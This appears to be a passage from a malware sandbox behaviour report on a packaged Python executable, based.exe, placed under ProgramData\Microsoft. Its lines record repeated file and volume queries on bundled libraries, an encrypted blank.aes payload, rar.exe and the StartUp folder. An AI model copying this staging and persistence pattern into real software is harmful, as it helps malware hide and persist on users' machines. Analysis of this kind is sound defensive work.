                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
